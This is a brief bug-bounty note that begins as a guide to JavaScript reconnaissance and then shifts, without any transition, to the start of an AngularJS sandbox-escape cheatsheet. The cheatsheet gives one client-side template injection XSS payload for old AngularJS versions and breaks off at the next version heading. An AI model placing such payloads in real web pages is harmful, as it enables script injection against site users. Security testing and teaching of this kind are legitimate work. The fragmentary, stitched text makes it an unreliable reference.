This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1